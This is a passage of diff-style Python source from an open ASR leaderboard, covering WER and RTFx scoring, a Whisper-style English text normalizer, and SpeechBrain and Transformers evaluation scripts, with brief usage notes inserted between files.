+ manifest_path = os.path.join(basedir, f'MODEL_{model_id}_DATASET_{dataset_path}_{dataset_name}_{split}.jsonl')
251
+ with open(manifest_path, 'w', encoding='utf-8') as f:
252
+ for (idx, (text, transcript, audio_length, transcription_time)) in enumerate(zip(references, transcriptions, audio_length, transcription_time)):
253
+ datum = {'audio_filepath': f'sample_{idx}', 'duration': audio_length, 'time': transcription_time, 'text': text, 'pred_text': transcript}
254
+ f.write(f'{json.dumps(datum, ensure_ascii=False)}\n')
255
+ return manifest_path
256
+
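# Each line of the manifest written above is a single JSON object, roughly:
#   {"audio_filepath": "sample_0", "duration": 6.27, "time": 0.31,
#    "text": "<normalized reference>", "pred_text": "<normalized prediction>"}
# (values are illustrative; "duration" and "time" serialize as null when not provided).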
257
+ def score_results(directory: str, model_id: str=None):
258
+ if directory.endswith(os.sep):
259
+ directory = directory[:-1]
260
+ result_files = list(glob.glob(f'{directory}/**/*.jsonl', recursive=True))
261
+ result_files = list(sorted(result_files))
262
+ if model_id is not None and model_id != '':
263
+ print('Filtering models by id:', model_id)
264
+ model_id = model_id.replace('/', '-')
265
+ result_files = [fp for fp in result_files if model_id in fp]
266
+ if len(result_files) == 0:
267
+ raise ValueError(f'No result files found in {directory}')
268
+
269
+ def parse_filepath(fp: str):
270
+ model_index = fp.find('MODEL_')
271
+ fp = fp[model_index:]
272
+ ds_index = fp.find('DATASET_')
273
+ model_id = fp[:ds_index].replace('MODEL_', '').rstrip('_')
274
+ author_index = model_id.find('-')
275
+ model_id = model_id[:author_index] + '/' + model_id[author_index + 1:]
276
+ ds_fp = fp[ds_index:]
277
+ dataset_id = ds_fp.replace('DATASET_', '').rstrip('.jsonl')
278
+ return (model_id, dataset_id)
279
+ results = {}
280
+ wer_metric = evaluate.load('wer')
281
+ for result_file in result_files:
282
+ manifest = read_manifest(result_file)
283
+ (model_id_of_file, dataset_id) = parse_filepath(result_file)
284
+ references = [datum['text'] for datum in manifest]
285
+ predictions = [datum['pred_text'] for datum in manifest]
286
+ time = [datum['time'] for datum in manifest]
287
+ duration = [datum['duration'] for datum in manifest]
288
+ compute_rtfx = all(time) and all(duration)
289
+ wer = wer_metric.compute(references=references, predictions=predictions)
290
+ wer = round(100 * wer, 2)
291
+ if compute_rtfx:
292
+ audio_length = sum(duration)
293
+ inference_time = sum(time)
294
+ rtfx = round(sum(duration) / sum(time), 4)
295
+ else:
296
+ audio_length = inference_time = rtfx = None
297
+ result_key = f'{model_id_of_file} | {dataset_id}'
298
+ results[result_key] = {'wer': wer, 'audio_length': audio_length, 'inference_time': inference_time, 'rtfx': rtfx}
299
+ print('*' * 80)
300
+ print('Results per dataset:')
301
+ print('*' * 80)
302
+ for (k, v) in results.items():
303
+ metrics = f"{k}: WER = {v['wer']:0.2f} %"
304
+ if v['rtfx'] is not None:
305
+ metrics += f", RTFx = {v['rtfx']:0.2f}"
306
+ print(metrics)
307
+ composite_wer = defaultdict(float)
308
+ composite_audio_length = defaultdict(float)
309
+ composite_inference_time = defaultdict(float)
310
+ count_entries = defaultdict(int)
311
+ for (k, v) in results.items():
312
+ key = k.split('|')[0].strip()
313
+ composite_wer[key] += v['wer']
314
+ if v['rtfx'] is not None:
315
+ composite_audio_length[key] += v['audio_length']
316
+ composite_inference_time[key] += v['inference_time']
317
+ else:
318
+ composite_audio_length[key] = composite_inference_time[key] = None
319
+ count_entries[key] += 1
320
+ print()
321
+ print('*' * 80)
322
+ print('Composite Results:')
323
+ print('*' * 80)
324
+ for (k, v) in composite_wer.items():
325
+ wer = v / count_entries[k]
326
+ print(f'{k}: WER = {wer:0.2f} %')
327
+ for k in composite_audio_length:
328
+ if composite_audio_length[k] is not None:
329
+ rtfx = composite_audio_length[k] / composite_inference_time[k]
330
+ print(f'{k}: RTFx = {rtfx:0.2f}')
331
+ print('*' * 80)
332
+ return (composite_wer, results)
333
+
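Taken together, write_manifest and score_results form the scoring loop of the leaderboard: every evaluation run writes one JSONL manifest under ./results/, and the scorer then aggregates WER (and RTFx when timings are present) across all manifests it finds. A minimal usage sketch, assuming the leaderboard's normalizer package is importable; the model id, dataset names and timings below are illustrative:

    from normalizer.eval_utils import write_manifest, score_results

    references = ["hello world", "the quick brown fox"]
    predictions = ["hello world", "the quick brown fox jumps"]
    # audio durations (s) and per-sample transcription times (s) are optional;
    # when both are provided, score_results also reports RTFx = duration / time
    manifest_path = write_manifest(
        references, predictions,
        model_id="openai/whisper-tiny.en",                      # illustrative
        dataset_path="hf-audio/esb-datasets-test-only-sorted",  # illustrative
        dataset_name="librispeech", split="test",
        audio_length=[1.4, 2.1], transcription_time=[0.2, 0.3],
    )
    composite_wer, per_dataset = score_results("./results", model_id="openai/whisper-tiny.en")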
334
+ # File: open_asr_leaderboard-main/normalizer/normalizer.py
335
+ import re
336
+ import unicodedata
337
+ from fractions import Fraction
338
+ from typing import Iterator, List, Match, Optional, Union
339
+ from .english_abbreviations import english_spelling_normalizer
340
+ import regex
341
+ ADDITIONAL_DIACRITICS = {'œ': 'oe', 'Œ': 'OE', 'ø': 'o', 'Ø': 'O', 'æ': 'ae', 'Æ': 'AE', 'ß': 'ss', 'ẞ': 'SS', 'đ': 'd', 'Đ': 'D', 'ð': 'd', 'Ð': 'D', 'þ': 'th', 'Þ': 'th', 'ł': 'l', 'Ł': 'L'}
342
+
343
+ def remove_symbols_and_diacritics(s: str, keep=''):
344
+
345
+ def replace_character(char):
346
+ if char in keep:
347
+ return char
348
+ elif char in ADDITIONAL_DIACRITICS:
349
+ return ADDITIONAL_DIACRITICS[char]
350
+ elif unicodedata.category(char) == 'Mn':
351
+ return ''
352
+ elif unicodedata.category(char)[0] in 'MSP':
353
+ return ' '
354
+ return char
355
+ return ''.join((replace_character(c) for c in unicodedata.normalize('NFKD', s)))
356
+
357
+ def remove_symbols(s: str):
358
+ return ''.join((' ' if unicodedata.category(c)[0] in 'MSP' else c for c in unicodedata.normalize('NFKC', s)))
359
+
360
+ class BasicTextNormalizer:
361
+
362
+ def __init__(self, remove_diacritics: bool=False, split_letters: bool=False):
363
+ self.clean = remove_symbols_and_diacritics if remove_diacritics else remove_symbols
364
+ self.split_letters = split_letters
365
+
366
+ def __call__(self, s: str):
367
+ s = s.lower()
368
+ s = re.sub('[<\\[][^>\\]]*[>\\]]', '', s)
369
+ s = re.sub('\\(([^)]+?)\\)', '', s)
370
+ s = self.clean(s).lower()
371
+ if self.split_letters:
372
+ s = ' '.join(regex.findall('\\X', s, regex.U))
373
+ s = re.sub('\\s+', ' ', s)
374
+ return s
375
+
376
+ class EnglishNumberNormalizer:
377
+
378
+ def __init__(self):
379
+ super().__init__()
380
+ self.zeros = {'o', 'oh', 'zero'}
381
+ self.ones = {name: i for (i, name) in enumerate(['one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve', 'thirteen', 'fourteen', 'fifteen', 'sixteen', 'seventeen', 'eighteen', 'nineteen'], start=1)}
382
+ self.ones_plural = {'sixes' if name == 'six' else name + 's': (value, 's') for (name, value) in self.ones.items()}
383
+ self.ones_ordinal = {'zeroth': (0, 'th'), 'first': (1, 'st'), 'second': (2, 'nd'), 'third': (3, 'rd'), 'fifth': (5, 'th'), 'twelfth': (12, 'th'), **{name + ('h' if name.endswith('t') else 'th'): (value, 'th') for (name, value) in self.ones.items() if value > 3 and value != 5 and (value != 12)}}
384
+ self.ones_suffixed = {**self.ones_plural, **self.ones_ordinal}
385
+ self.tens = {'twenty': 20, 'thirty': 30, 'forty': 40, 'fifty': 50, 'sixty': 60, 'seventy': 70, 'eighty': 80, 'ninety': 90}
386
+ self.tens_plural = {name.replace('y', 'ies'): (value, 's') for (name, value) in self.tens.items()}
387
+ self.tens_ordinal = {name.replace('y', 'ieth'): (value, 'th') for (name, value) in self.tens.items()}
388
+ self.tens_suffixed = {**self.tens_plural, **self.tens_ordinal}
389
+ self.multipliers = {'hundred': 100, 'thousand': 1000, 'million': 1000000, 'billion': 1000000000, 'trillion': 1000000000000, 'quadrillion': 1000000000000000, 'quintillion': 1000000000000000000, 'sextillion': 1000000000000000000000, 'septillion': 1000000000000000000000000, 'octillion': 1000000000000000000000000000, 'nonillion': 1000000000000000000000000000000, 'decillion': 1000000000000000000000000000000000}
390
+ self.multipliers_plural = {name + 's': (value, 's') for (name, value) in self.multipliers.items()}
391
+ self.multipliers_ordinal = {name + 'th': (value, 'th') for (name, value) in self.multipliers.items()}
392
+ self.multipliers_suffixed = {**self.multipliers_plural, **self.multipliers_ordinal}
393
+ self.decimals = {*self.ones, *self.tens, *self.zeros}
394
+ self.preceding_prefixers = {'minus': '-', 'negative': '-', 'plus': '+', 'positive': '+'}
395
+ self.following_prefixers = {'pound': '£', 'pounds': '£', 'euro': '€', 'euros': '€', 'dollar': '$', 'dollars': '$', 'cent': '¢', 'cents': '¢'}
396
+ self.prefixes = set(list(self.preceding_prefixers.values()) + list(self.following_prefixers.values()))
397
+ self.suffixers = {'per': {'cent': '%'}, 'percent': '%'}
398
+ self.specials = {'and', 'double', 'triple', 'point'}
399
+ self.words = {key for mapping in [self.zeros, self.ones, self.ones_suffixed, self.tens, self.tens_suffixed, self.multipliers, self.multipliers_suffixed, self.preceding_prefixers, self.following_prefixers, self.suffixers, self.specials] for key in mapping}
400
+ self.literal_words = {'one', 'ones'}
401
+
402
+ def process_words(self, words: List[str]) -> Iterator[str]:
403
+ prefix: Optional[str] = None
404
+ value: Optional[Union[str, int]] = None
405
+ skip = False
406
+
407
+ def to_fraction(s: str):
408
+ try:
409
+ return Fraction(s)
410
+ except ValueError:
411
+ return None
412
+
413
+ def output(result: Union[str, int]):
414
+ nonlocal prefix, value
415
+ result = str(result)
416
+ if prefix is not None:
417
+ result = prefix + result
418
+ value = None
419
+ prefix = None
420
+ return result
421
+ if len(words) == 0:
422
+ return
423
+ for (i, current) in enumerate(words):
424
+ prev = words[i - 1] if i != 0 else None
425
+ next = words[i + 1] if i != len(words) - 1 else None
426
+ if skip:
427
+ skip = False
428
+ continue
429
+ next_is_numeric = next is not None and re.match('^\\d+(\\.\\d+)?$', next)
430
+ has_prefix = current[0] in self.prefixes
431
+ current_without_prefix = current[1:] if has_prefix else current
432
+ if re.match('^\\d+(\\.\\d+)?$', current_without_prefix):
433
+ f = to_fraction(current_without_prefix)
434
+ if f is None:
435
+ raise ValueError('Converting the fraction failed')
436
+ if value is not None:
437
+ if isinstance(value, str) and value.endswith('.'):
438
+ value = str(value) + str(current)
439
+ continue
440
+ else:
441
+ yield output(value)
442
+ prefix = current[0] if has_prefix else prefix
443
+ if f.denominator == 1:
444
+ value = f.numerator
445
+ else:
446
+ value = current_without_prefix
447
+ elif current not in self.words:
448
+ if value is not None:
449
+ yield output(value)
450
+ yield output(current)
451
+ elif current in self.zeros:
452
+ value = str(value or '') + '0'
453
+ elif current in self.ones:
454
+ ones = self.ones[current]
455
+ if value is None:
456
+ value = ones
457
+ elif isinstance(value, str) or prev in self.ones:
458
+ if prev in self.tens and ones < 10:
459
+ value = value[:-1] + str(ones)
460
+ else:
461
+ value = str(value) + str(ones)
462
+ elif ones < 10:
463
+ if value % 10 == 0:
464
+ value += ones
465
+ else:
466
+ value = str(value) + str(ones)
467
+ elif value % 100 == 0:
468
+ value += ones
469
+ else:
470
+ value = str(value) + str(ones)
471
+ elif current in self.ones_suffixed:
472
+ (ones, suffix) = self.ones_suffixed[current]
473
+ if value is None:
474
+ yield output(str(ones) + suffix)
475
+ elif isinstance(value, str) or prev in self.ones:
476
+ if prev in self.tens and ones < 10:
477
+ yield output(value[:-1] + str(ones) + suffix)
478
+ else:
479
+ yield output(str(value) + str(ones) + suffix)
480
+ elif ones < 10:
481
+ if value % 10 == 0:
482
+ yield output(str(value + ones) + suffix)
483
+ else:
484
+ yield output(str(value) + str(ones) + suffix)
485
+ elif value % 100 == 0:
486
+ yield output(str(value + ones) + suffix)
487
+ else:
488
+ yield output(str(value) + str(ones) + suffix)
489
+ value = None
490
+ elif current in self.tens:
491
+ tens = self.tens[current]
492
+ if value is None:
493
+ value = tens
494
+ elif isinstance(value, str):
495
+ value = str(value) + str(tens)
496
+ elif value % 100 == 0:
497
+ value += tens
498
+ else:
499
+ value = str(value) + str(tens)
500
+ elif current in self.tens_suffixed:
501
+ (tens, suffix) = self.tens_suffixed[current]
502
+ if value is None:
503
+ yield output(str(tens) + suffix)
504
+ elif isinstance(value, str):
505
+ yield output(str(value) + str(tens) + suffix)
506
+ elif value % 100 == 0:
507
+ yield output(str(value + tens) + suffix)
508
+ else:
509
+ yield output(str(value) + str(tens) + suffix)
510
+ elif current in self.multipliers:
511
+ multiplier = self.multipliers[current]
512
+ if value is None:
513
+ value = multiplier
514
+ elif isinstance(value, str) or value == 0:
515
+ f = to_fraction(value)
516
+ p = f * multiplier if f is not None else None
517
+ if f is not None and p.denominator == 1:
518
+ value = p.numerator
519
+ else:
520
+ yield output(value)
521
+ value = multiplier
522
+ else:
523
+ before = value // 1000 * 1000
524
+ residual = value % 1000
525
+ value = before + residual * multiplier
526
+ elif current in self.multipliers_suffixed:
527
+ (multiplier, suffix) = self.multipliers_suffixed[current]
528
+ if value is None:
529
+ yield output(str(multiplier) + suffix)
530
+ elif isinstance(value, str):
531
+ f = to_fraction(value)
532
+ p = f * multiplier if f is not None else None
533
+ if f is not None and p.denominator == 1:
534
+ yield output(str(p.numerator) + suffix)
535
+ else:
536
+ yield output(value)
537
+ yield output(str(multiplier) + suffix)
538
+ else:
539
+ before = value // 1000 * 1000
540
+ residual = value % 1000
541
+ value = before + residual * multiplier
542
+ yield output(str(value) + suffix)
543
+ value = None
544
+ elif current in self.preceding_prefixers:
545
+ if value is not None:
546
+ yield output(value)
547
+ if next in self.words or next_is_numeric:
548
+ prefix = self.preceding_prefixers[current]
549
+ else:
550
+ yield output(current)
551
+ elif current in self.following_prefixers:
552
+ if value is not None:
553
+ prefix = self.following_prefixers[current]
554
+ yield output(value)
555
+ else:
556
+ yield output(current)
557
+ elif current in self.suffixers:
558
+ if value is not None:
559
+ suffix = self.suffixers[current]
560
+ if isinstance(suffix, dict):
561
+ if next in suffix:
562
+ yield output(str(value) + suffix[next])
563
+ skip = True
564
+ else:
565
+ yield output(value)
566
+ yield output(current)
567
+ else:
568
+ yield output(str(value) + suffix)
569
+ else:
570
+ yield output(current)
571
+ elif current in self.specials:
572
+ if next not in self.words and (not next_is_numeric):
573
+ if value is not None:
574
+ yield output(value)
575
+ yield output(current)
576
+ elif current == 'and':
577
+ if prev not in self.multipliers:
578
+ if value is not None:
579
+ yield output(value)
580
+ yield output(current)
581
+ elif current == 'double' or current == 'triple':
582
+ if next in self.ones or next in self.zeros:
583
+ repeats = 2 if current == 'double' else 3
584
+ ones = self.ones.get(next, 0)
585
+ value = str(value or '') + str(ones) * repeats
586
+ skip = True
587
+ else:
588
+ if value is not None:
589
+ yield output(value)
590
+ yield output(current)
591
+ elif current == 'point':
592
+ if next in self.decimals or next_is_numeric:
593
+ value = str(value or '') + '.'
594
+ else:
595
+ raise ValueError(f'Unexpected token: {current}')
596
+ else:
597
+ raise ValueError(f'Unexpected token: {current}')
598
+ if value is not None:
599
+ yield output(value)
600
+
601
+ def preprocess(self, s: str):
602
+ results = []
603
+ segments = re.split('\\band\\s+a\\s+half\\b', s)
604
+ for (i, segment) in enumerate(segments):
605
+ if len(segment.strip()) == 0:
606
+ continue
607
+ if i == len(segments) - 1:
608
+ results.append(segment)
609
+ else:
610
+ results.append(segment)
611
+ last_word = segment.rsplit(maxsplit=2)[-1]
612
+ if last_word in self.decimals or last_word in self.multipliers:
613
+ results.append('point five')
614
+ else:
615
+ results.append('and a half')
616
+ s = ' '.join(results)
617
+ s = re.sub('([a-z])([0-9])', '\\1 \\2', s)
618
+ s = re.sub('([0-9])([a-z])', '\\1 \\2', s)
619
+ s = re.sub('([0-9])\\s+(st|nd|rd|th|s)\\b', '\\1\\2', s)
620
+ return s
621
+
622
+ def postprocess(self, s: str):
623
+
624
+ def combine_cents(m: Match):
625
+ try:
626
+ currency = m.group(1)
627
+ integer = m.group(2)
628
+ cents = int(m.group(3))
629
+ return f'{currency}{integer}.{cents:02d}'
630
+ except ValueError:
631
+ return m.string
632
+
633
+ def extract_cents(m: Match):
634
+ try:
635
+ return f'¢{int(m.group(1))}'
636
+ except ValueError:
637
+ return m.string
638
+ s = re.sub('([€£$])([0-9]+) (?:and )?¢([0-9]{1,2})\\b', combine_cents, s)
639
+ s = re.sub('[€£$]0.([0-9]{1,2})\\b', extract_cents, s)
640
+ s = re.sub('\\b1(s?)\\b', 'one\\1', s)
641
+ return s
642
+
643
+ def __call__(self, s: str):
644
+ s = self.preprocess(s)
645
+ s = ' '.join((word for word in self.process_words(s.split()) if word is not None))
646
+ s = self.postprocess(s)
647
+ return s
648
+
649
+ class EnglishSpellingNormalizer:
650
+
651
+ def __init__(self, english_spelling_mapping):
652
+ self.mapping = english_spelling_mapping
653
+
654
+ def __call__(self, s: str):
655
+ return ' '.join((self.mapping.get(word, word) for word in s.split()))
656
+
657
+ class EnglishTextNormalizer:
658
+
659
+ def __init__(self, english_spelling_mapping=english_spelling_normalizer):
660
+ self.ignore_patterns = '\\b(hmm|mm|mhm|mmm|uh|um)\\b'
661
+ self.replacers = {"\\bwon't\\b": 'will not', "\\bcan't\\b": 'can not', "\\blet's\\b": 'let us', "\\bain't\\b": 'aint', "\\by'all\\b": 'you all', '\\bwanna\\b': 'want to', '\\bgotta\\b': 'got to', '\\bgonna\\b': 'going to', "\\bi'ma\\b": 'i am going to', '\\bimma\\b': 'i am going to', '\\bwoulda\\b': 'would have', '\\bcoulda\\b': 'could have', '\\bshoulda\\b': 'should have', "\\bma'am\\b": 'madam', '\\bmr\\b': 'mister ', '\\bmrs\\b': 'missus ', '\\bst\\b': 'saint ', '\\bdr\\b': 'doctor ', '\\bprof\\b': 'professor ', '\\bcapt\\b': 'captain ', '\\bgov\\b': 'governor ', '\\bald\\b': 'alderman ', '\\bgen\\b': 'general ', '\\bsen\\b': 'senator ', '\\brep\\b': 'representative ', '\\bpres\\b': 'president ', '\\brev\\b': 'reverend ', '\\bhon\\b': 'honorable ', '\\basst\\b': 'assistant ', '\\bassoc\\b': 'associate ', '\\blt\\b': 'lieutenant ', '\\bcol\\b': 'colonel ', '\\bjr\\b': 'junior ', '\\bsr\\b': 'senior ', '\\besq\\b': 'esquire ', "'d been\\b": ' had been', "'s been\\b": ' has been', "'d gone\\b": ' had gone', "'s gone\\b": ' has gone', "'d done\\b": ' had done', "'s got\\b": ' has got', "n't\\b": ' not', "'re\\b": ' are', "'s\\b": ' is', "'d\\b": ' would', "'ll\\b": ' will', "'t\\b": ' not', "'ve\\b": ' have', "'m\\b": ' am'}
662
+ self.standardize_numbers = EnglishNumberNormalizer()
663
+ self.standardize_spellings = EnglishSpellingNormalizer(english_spelling_mapping)
664
+
665
+ def __call__(self, s: str):
666
+ s = s.lower()
667
+ s = re.sub('[<\\[][^>\\]]*[>\\]]', '', s)
668
+ s = re.sub('\\(([^)]+?)\\)', '', s)
669
+ s = re.sub(self.ignore_patterns, '', s)
670
+ s = re.sub("\\s+'", "'", s)
671
+ for (pattern, replacement) in self.replacers.items():
672
+ s = re.sub(pattern, replacement, s)
673
+ s = re.sub('(\\d),(\\d)', '\\1\\2', s)
674
+ s = re.sub('\\.([^0-9]|$)', ' \\1', s)
675
+ s = remove_symbols_and_diacritics(s, keep='.%$¢€£')
676
+ s = self.standardize_numbers(s)
677
+ s = self.standardize_spellings(s)
678
+ s = re.sub('[.$¢€£]([^0-9])', ' \\1', s)
679
+ s = re.sub('([^0-9])%', '\\1 ', s)
680
+ s = re.sub('\\s+', ' ', s)
681
+ return s
682
+
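EnglishTextNormalizer is the Whisper-style normalizer applied to both references and predictions before WER is computed: it lower-cases, expands contractions and spelled abbreviations, converts number words to digits and currency symbols, and strips punctuation and diacritics. A small illustrative sketch (the sentence and the exact output are examples, not taken from the file above):

    from normalizer.normalizer import EnglishTextNormalizer

    normalize = EnglishTextNormalizer()
    print(normalize("Mr. Smith paid twenty five dollars, didn't he?"))
    # -> roughly: "mister smith paid $25 did not he"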
683
+ # File: open_asr_leaderboard-main/speechbrain/run_eval.py
684
+ """"""
685
+ import argparse
686
+ import time
687
+ import evaluate
688
+ from normalizer import data_utils
689
+ from tqdm import tqdm
690
+ import torch
691
+ import speechbrain.inference.ASR as ASR
692
+ from speechbrain.utils.data_utils import batch_pad_right
693
+ import os
694
+
695
+ def get_model(speechbrain_repository: str, speechbrain_pretrained_class_name: str, **kwargs):
696
+ run_opt_defaults = {'device': 'cpu', 'data_parallel_count': -1, 'data_parallel_backend': False, 'distributed_launch': False, 'distributed_backend': 'nccl', 'jit_module_keys': None}
697
+ run_opts = {**run_opt_defaults, **kwargs}
698
+ kwargs = {'source': f'{speechbrain_repository}', 'savedir': f'pretrained_models/{speechbrain_repository}', 'run_opts': run_opts}
699
+ try:
700
+ model_class = getattr(ASR, speechbrain_pretrained_class_name)
701
+ except AttributeError:
702
+ raise AttributeError(f'SpeechBrain Pretrained class: {speechbrain_pretrained_class_name} not found in pretrained.py')
703
+ return model_class.from_hparams(**kwargs)
704
+
705
+ def main(args):
706
+ if args.device == -1:
707
+ device = 'cpu'
708
+ else:
709
+ device = f'cuda:{args.device}'
710
+ model = get_model(args.source, args.speechbrain_pretrained_class_name, device=device)
711
+
712
+ def benchmark(batch):
713
+ audios = [torch.from_numpy(sample['array']) for sample in batch['audio']]
714
+ minibatch_size = len(audios)
715
+ start_time = time.time()
716
+ (audios, audio_lens) = batch_pad_right(audios)
717
+ audios = audios.to(device)
718
+ audio_lens = audio_lens.to(device)
719
+ (predictions, _) = model.transcribe_batch(audios, audio_lens)
720
+ runtime = time.time() - start_time
721
+ batch['transcription_time_s'] = minibatch_size * [runtime / minibatch_size]
722
+ batch['predictions'] = [data_utils.normalizer(pred) for pred in predictions]
723
+ batch['references'] = batch['norm_text']
724
+ return batch
725
+ if args.warmup_steps is not None:
726
+ dataset = data_utils.load_data(args)
727
+ dataset = data_utils.prepare_data(dataset)
728
+ num_warmup_samples = args.warmup_steps * args.batch_size
729
+ if args.streaming:
730
+ warmup_dataset = dataset.take(num_warmup_samples)
731
+ else:
732
+ warmup_dataset = dataset.select(range(min(num_warmup_samples, len(dataset))))
733
+ warmup_dataset = iter(warmup_dataset.map(benchmark, batch_size=args.batch_size, batched=True))
734
+ for _ in tqdm(warmup_dataset, desc='Warming up...'):
735
+ continue
736
+ dataset = data_utils.load_data(args)
737
+ if args.max_eval_samples is not None and args.max_eval_samples > 0:
738
+ print(f'Subsampling dataset to first {args.max_eval_samples} samples!')
739
+ if args.streaming:
740
+ dataset = dataset.take(args.max_eval_samples)
741
+ else:
742
+ dataset = dataset.select(range(min(args.max_eval_samples, len(dataset))))
743
+ dataset = data_utils.prepare_data(dataset)
744
+ dataset = dataset.map(benchmark, batch_size=args.batch_size, batched=True, remove_columns=['audio'])
745
+ all_results = {'audio_length_s': [], 'transcription_time_s': [], 'predictions': [], 'references': []}
746
+ result_iter = iter(dataset)
747
+ for result in tqdm(result_iter, desc='Samples...'):
748
+ for key in all_results:
749
+ all_results[key].append(result[key])
750
+ manifest_path = data_utils.write_manifest(all_results['references'], all_results['predictions'], args.source, args.dataset_path, args.dataset, args.split, audio_length=all_results['audio_length_s'], transcription_time=all_results['transcription_time_s'])
751
+ print('Results saved at path:', os.path.abspath(manifest_path))
752
+ wer_metric = evaluate.load('wer')
753
+ wer = wer_metric.compute(references=all_results['references'], predictions=all_results['predictions'])
754
+ wer = round(100 * wer, 2)
755
+ rtfx = round(sum(all_results['audio_length_s']) / sum(all_results['transcription_time_s']), 2)
756
+ print('WER:', wer, '%', 'RTFx:', rtfx)
757
+ if __name__ == '__main__':
758
+ parser = argparse.ArgumentParser()
759
+ parser.add_argument('--source', type=str, required=True, help='SpeechBrain model repository. E.g. `asr-crdnn-rnnlm-librispeech`')
760
+ parser.add_argument('--speechbrain_pretrained_class_name', type=str, required=True, help='SpeechBrain pretrained class name. E.g. `EncoderASR`')
761
+ parser.add_argument('--dataset_path', type=str, default='hf-audio/esb-datasets-test-only-sorted', help='Dataset path. By default, it is `esb/datasets`')
762
+ parser.add_argument('--dataset', type=str, required=True, help="Dataset name. *E.g.* `librispeech_asr` for the LibriSpeech ASR dataset, or `common_voice` for Common Voice. The full list of dataset names can be found at `https://huggingface.co/datasets/esb/datasets`")
763
+ parser.add_argument('--split', type=str, default='test', help="Split of the dataset. *E.g.* `validation` for the dev split, or `test` for the test split.")
764
+ parser.add_argument('--device', type=int, default=-1, help='The device to run the pipeline on. -1 for CPU (default), 0 for the first GPU and so on.')
765
+ parser.add_argument('--batch_size', type=int, default=16, help='Number of samples to go through each streamed batch.')
766
+ parser.add_argument('--max_eval_samples', type=int, default=None, help='Number of samples to be evaluated. Put a lower number e.g. 64 for testing this script.')
767
+ parser.add_argument('--no-streaming', dest='streaming', action='store_false', help="Choose whether you'd like to download the entire dataset or stream it during the evaluation.")
768
+ parser.add_argument('--warmup_steps', type=int, default=5, help='Number of warm-up steps to run before launching the timed runs.')
769
+ args = parser.parse_args()
770
+ parser.set_defaults(streaming=True)
771
+ main(args)
772
+
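The script above is driven entirely by its CLI flags. A representative invocation, written here as a Python subprocess call (the SpeechBrain repository, pretrained class and split names are illustrative, and run_eval.py is assumed to be the file shown above):

    import subprocess

    subprocess.run(
        [
            "python", "run_eval.py",
            "--source", "speechbrain/asr-crdnn-rnnlm-librispeech",       # illustrative HF repo
            "--speechbrain_pretrained_class_name", "EncoderDecoderASR",   # illustrative class
            "--dataset", "librispeech",
            "--split", "test.clean",
            "--device", "0",
            "--batch_size", "16",
            "--max_eval_samples", "64",  # keep it small for a quick smoke test
        ],
        check=True,
    )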
773
+ # File: open_asr_leaderboard-main/transformers/run_eval.py
774
+ import argparse
775
+ import os
776
+ import torch
777
+ from torch.nn.attention import sdpa_kernel, SDPBackend
778
+ from transformers import AutoConfig, AutoModelForSpeechSeq2Seq, AutoModelForCTC, AutoProcessor, MODEL_FOR_SPEECH_SEQ_2_SEQ_MAPPING
779
+ import evaluate
780
+ from normalizer import data_utils
781
+ import time
782
+ from tqdm import tqdm
783
+ wer_metric = evaluate.load('wer')
784
+ torch.set_float32_matmul_precision('high')
785
+
786
+ def main(args):
787
+ config = AutoConfig.from_pretrained(args.model_id)
788
+ cls_model = AutoModelForSpeechSeq2Seq if type(config) in MODEL_FOR_SPEECH_SEQ_2_SEQ_MAPPING else AutoModelForCTC
789
+ model = cls_model.from_pretrained(args.model_id, torch_dtype=torch.bfloat16, attn_implementation='sdpa').to(args.device)
790
+ processor = AutoProcessor.from_pretrained(args.model_id)
791
+ model_input_name = processor.model_input_names[0]
792
+ if model.can_generate():
793
+ gen_kwargs = {'max_new_tokens': args.max_new_tokens}
794
+ if getattr(model.generation_config, 'is_multilingual'):
795
+ gen_kwargs['language'] = 'en'
796
+ gen_kwargs['task'] = 'transcribe'
797
+ elif args.max_new_tokens:
798
+ raise ValueError('`max_new_tokens` should only be set for auto-regressive models, but got a CTC model.')
799
+ if args.torch_compile:
800
+ model.forward = torch.compile(model.forward, mode=args.compile_mode, fullgraph=True)
801
+ if model.can_generate():
802
+ model.generation_config.cache_implementation = 'static'
803
+
804
+ def benchmark(batch, min_new_tokens=None):
805
+ audios = [audio['array'] for audio in batch['audio']]
806
+ minibatch_size = len(audios)
807
+ start_time = time.time()
808
+ padding_size = None
809
+ if minibatch_size != args.batch_size and args.torch_compile:
810
+ padding_size = args.batch_size - minibatch_size
811
+ padding_audios = [audios[-1] for _ in range(padding_size)]
812
+ audios.extend(padding_audios)
813
+ if not model.can_generate():
814
+ inputs = processor(audios, sampling_rate=16000, truncation=False, padding='longest', return_tensors='pt', return_attention_mask=True)
815
+ else:
816
+ inputs = processor(audios, sampling_rate=16000, return_tensors='pt', device=args.device)
817
+ inputs = inputs.to(args.device)
818
+ inputs[model_input_name] = inputs[model_input_name].to(torch.bfloat16)
819
+ with sdpa_kernel(SDPBackend.MATH if args.torch_compile else SDPBackend.FLASH_ATTENTION):
820
+ if model.can_generate():
821
+ pred_ids = model.generate(**inputs, **gen_kwargs, min_new_tokens=min_new_tokens)
822
+ else:
823
+ with torch.no_grad():
824
+ logits = model(**inputs).logits
825
+ pred_ids = logits.argmax(-1)
826
+ if padding_size is not None:
827
+ pred_ids = pred_ids[:-padding_size, ...]
828
+ pred_text = processor.batch_decode(pred_ids, skip_special_tokens=True)
829
+ runtime = time.time() - start_time
830
+ batch['transcription_time_s'] = minibatch_size * [runtime / minibatch_size]
831
+ batch['predictions'] = [data_utils.normalizer(pred) for pred in pred_text]
832
+ batch['references'] = batch['norm_text']
833
+ return batch
834
+ if args.warmup_steps is not None:
835
+ dataset = data_utils.load_data(args)
836
+ dataset = data_utils.prepare_data(dataset)
837
+ num_warmup_samples = args.warmup_steps * args.batch_size
838
+ if args.streaming:
839
+ warmup_dataset = dataset.take(num_warmup_samples)
840
+ else:
841
+ warmup_dataset = dataset.select(range(min(num_warmup_samples, len(dataset))))
842
+ warmup_dataset = iter(warmup_dataset.map(benchmark, batch_size=args.batch_size, batched=True, fn_kwargs={'min_new_tokens': args.max_new_tokens}))
843
+ for _ in tqdm(warmup_dataset, desc='Warming up...'):
844
+ continue
845
+ dataset = data_utils.load_data(args)
846
+ if args.max_eval_samples is not None and args.max_eval_samples > 0:
847
+ print(f'Subsampling dataset to first {args.max_eval_samples} samples!')
848
+ if args.streaming:
849
+ dataset = dataset.take(args.max_eval_samples)
850
+ else:
851
+ dataset = dataset.select(range(min(args.max_eval_samples, len(dataset))))
852
+ dataset = data_utils.prepare_data(dataset)
853
